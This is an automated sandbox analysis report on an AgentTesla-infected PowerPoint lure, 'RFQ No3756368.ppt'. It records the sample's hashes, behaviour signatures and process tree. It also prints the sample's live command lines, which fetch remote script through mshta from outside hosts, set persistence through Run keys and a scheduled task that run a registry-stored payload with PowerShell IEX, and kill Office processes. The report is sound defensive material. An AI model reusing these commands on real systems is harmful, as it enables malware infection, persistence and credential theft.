Analysis
- max time kernel: 106s
- max time network: 133s
- platform: windows10_x64
- resource: win10v20210410
- submitted: 22-04-2021 07:21

Static task: static1
Behavioral task: behavioral1
  Sample: RFQ No3756368.ppt
  Resource: win7v20210408
Behavioral task: behavioral2
  Sample: RFQ No3756368.ppt
  Resource: win10v20210410

General
- Target: RFQ No3756368.ppt
- Size: 78KB
- MD5: 4b485ae386bfa68a2eeac2dc35bda606
- SHA1: 8086ec71e34fd18a1a8e3e20721bc466caf3cda4
- SHA256: 99b84223a505faa4dcd483e6e925dddfe5a890b41aa92b5e4ef5239a26036075
- SHA512: 7918aedf847172a8dfed81931ebe5247a627922d5042d6a10799089dd8bb711a1a8f4dc5301e5b65a0f8a27d11f8d815b7d615bb157854a70d1b5a93e8cb09d5
Malware Config
Signatures
- AgentTesla
  Agent Tesla is a remote access tool (RAT) written in Visual Basic.
- Process spawned unexpected child process (2 IoCs)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes: mshta.exe, powershell.exe
    description | pid | pid_target | process | target process
    Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process | 812 | 3892 | mshta.exe | POWERPNT.EXE
    Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2076 | 4020 | powershell.exe |
- AgentTesla Payload (1 IoC)
  Processes:
    resource | yara_rule
    behavioral2/memory/3892-187-0x00000000004375FE-mapping.dmp | family_agenttesla
- Blocklisted process makes network request (10 IoCs)
  Processes: mshta.exe, powershell.exe
    flow | pid | process
    17 | 812 | mshta.exe
    19 | 812 | mshta.exe
    21 | 812 | mshta.exe
    23 | 812 | mshta.exe
    25 | 812 | mshta.exe
    29 | 812 | mshta.exe
    32 | 812 | mshta.exe
    37 | 812 | mshta.exe
    39 | 812 | mshta.exe
    45 | 2076 | powershell.exe
- Adds Run key to start application (2 TTPs, 6 IoCs)
  Processes: mshta.exe
    Set value (str), process mshta.exe: \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"mshta\"\"http://1230948%[email protected]/p/47.html\""
    Set value (str), process mshta.exe: \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\nunukhaoo = "\"mshta\"\"http://1230948%[email protected]/p/47.html\""
    Set value (str), process mshta.exe: \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\replcia = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).nasdnasndnad)|IEX\"\", 0 : window.close\")"
    Key created, process mshta.exe: \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run
    Set value (str), process mshta.exe: \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\DLESOLCRETSAM = "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell ((gp HKCU:\\Software).MSOFFICELO)|IEX\"\", 0 : window.close\")"
    Set value (str), process mshta.exe: \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\dkkkksakdosexography = "\"mshta\"\"http://1230948%[email protected]/p/47.html\""
- Suspicious use of SetThreadContext (1 IoC)
  Processes: powershell.exe
    description | pid | process | target process
    PID 2076 set thread context of 3892 | 2076 | powershell.exe | aspnet_compiler.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Program crash (1 IoC)
  Processes: WerFault.exe
    pid | pid_target | process | target process
    2588 | 812 | WerFault.exe | mshta.exe
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes: POWERPNT.EXE
    Key value queried, process POWERPNT.EXE: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
    Key value queried, process POWERPNT.EXE: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
    Key opened, process POWERPNT.EXE: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
- Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes: POWERPNT.EXE
    Key opened, process POWERPNT.EXE: \REGISTRY\MACHINE\Hardware\Description\System\BIOS
    Key value queried, process POWERPNT.EXE: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
    Key value queried, process POWERPNT.EXE: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
- Kills process with taskkill (2 IoCs)
  Processes: taskkill.exe, taskkill.exe
    pid | process
    3704 | taskkill.exe
    2108 | taskkill.exe
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes: POWERPNT.EXE
    pid | process
    3892 | POWERPNT.EXE
- Suspicious behavior: EnumeratesProcesses (30 IoCs)
  Processes: powershell.exe, WerFault.exe, aspnet_compiler.exe
    pid | process | entries (in recorded order)
    2076 | powershell.exe | 2
    2588 | WerFault.exe | 15
    2076 | powershell.exe | 11
    3892 | aspnet_compiler.exe | 2
- Suspicious use of AdjustPrivilegeToken (47 IoCs)
  Processes: powershell.exe, taskkill.exe, taskkill.exe, WerFault.exe, aspnet_compiler.exe
    description | pid | process
    Token: SeDebugPrivilege | 2076 | powershell.exe
    Token: SeDebugPrivilege | 3704 | taskkill.exe
    Token: SeDebugPrivilege | 2108 | taskkill.exe
    Token: SeDebugPrivilege | 2588 | WerFault.exe
    Token: SeIncreaseQuotaPrivilege | 2076 | powershell.exe
    Token: SeSecurityPrivilege | 2076 | powershell.exe
    Token: SeTakeOwnershipPrivilege | 2076 | powershell.exe
    Token: SeLoadDriverPrivilege | 2076 | powershell.exe
    Token: SeSystemProfilePrivilege | 2076 | powershell.exe
    Token: SeSystemtimePrivilege | 2076 | powershell.exe
    Token: SeProfSingleProcessPrivilege | 2076 | powershell.exe
    Token: SeIncBasePriorityPrivilege | 2076 | powershell.exe
    Token: SeCreatePagefilePrivilege | 2076 | powershell.exe
    Token: SeBackupPrivilege | 2076 | powershell.exe
    Token: SeRestorePrivilege | 2076 | powershell.exe
    Token: SeShutdownPrivilege | 2076 | powershell.exe
    Token: SeDebugPrivilege | 2076 | powershell.exe
    Token: SeSystemEnvironmentPrivilege | 2076 | powershell.exe
    Token: SeRemoteShutdownPrivilege | 2076 | powershell.exe
    Token: SeUndockPrivilege | 2076 | powershell.exe
    Token: SeManageVolumePrivilege | 2076 | powershell.exe
    Token: 33 | 2076 | powershell.exe
    Token: 34 | 2076 | powershell.exe
    Token: 35 | 2076 | powershell.exe
    Token: 36 | 2076 | powershell.exe
    (the 21 powershell.exe entries from SeIncreaseQuotaPrivilege through Token: 36 are recorded a second time in the same order)
    Token: SeDebugPrivilege | 3892 | aspnet_compiler.exe
- Suspicious use of SetWindowsHookEx (4 IoCs)
  Processes: POWERPNT.EXE, aspnet_compiler.exe
    pid | process | entries
    3892 | POWERPNT.EXE | 3
    3892 | aspnet_compiler.exe | 1
- Suspicious use of WriteProcessMemory (31 IoCs)
  Processes: POWERPNT.EXE, mshta.exe, powershell.exe
    description | pid | process | target process | entries
    PID 3892 wrote to memory of 812 | 3892 | POWERPNT.EXE | mshta.exe | 2
    PID 812 wrote to memory of 2668 | 812 | mshta.exe | schtasks.exe | 2
    PID 812 wrote to memory of 3704 | 812 | mshta.exe | taskkill.exe | 2
    PID 812 wrote to memory of 2108 | 812 | mshta.exe | taskkill.exe | 2
    PID 2076 wrote to memory of 2064 | 2076 | powershell.exe | aspnet_compiler.exe | 3
    PID 2076 wrote to memory of 3312 | 2076 | powershell.exe | aspnet_compiler.exe | 3
    PID 2076 wrote to memory of 192 | 2076 | powershell.exe | aspnet_compiler.exe | 3
    PID 2076 wrote to memory of 1900 | 2076 | powershell.exe | aspnet_compiler.exe | 3
    PID 2076 wrote to memory of 2056 | 2076 | powershell.exe | aspnet_compiler.exe | 3
    PID 2076 wrote to memory of 3892 | 2076 | powershell.exe | aspnet_compiler.exe | 8
Processes
- C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\RFQ No3756368.ppt" /ou ""
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SYSTEM32\mshta.exe
    Command line: mshta http://www.j.mp/asdaksdjqwoddaskdajk
    - Process spawned unexpected child process
    - Blocklisted process makes network request
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\schtasks.exe
      Command line: "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%[email protected]/p/47.html""\"", 0 : window.close"\")
      - Creates scheduled task(s)
    - C:\Windows\System32\taskkill.exe
      Command line: "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\taskkill.exe
      Command line: "C:\Windows\System32\taskkill.exe" /f /im winword.exe
      - Kills process with taskkill
      - Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\WerFault.exe
      Command line: C:\Windows\system32\WerFault.exe -u -p 812 -s 2836
      - Program crash
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell -noexit ((gp HKCU:\Software).MSOFFICELO)|IEX
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
  - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
  - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
  - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
  - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
  - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads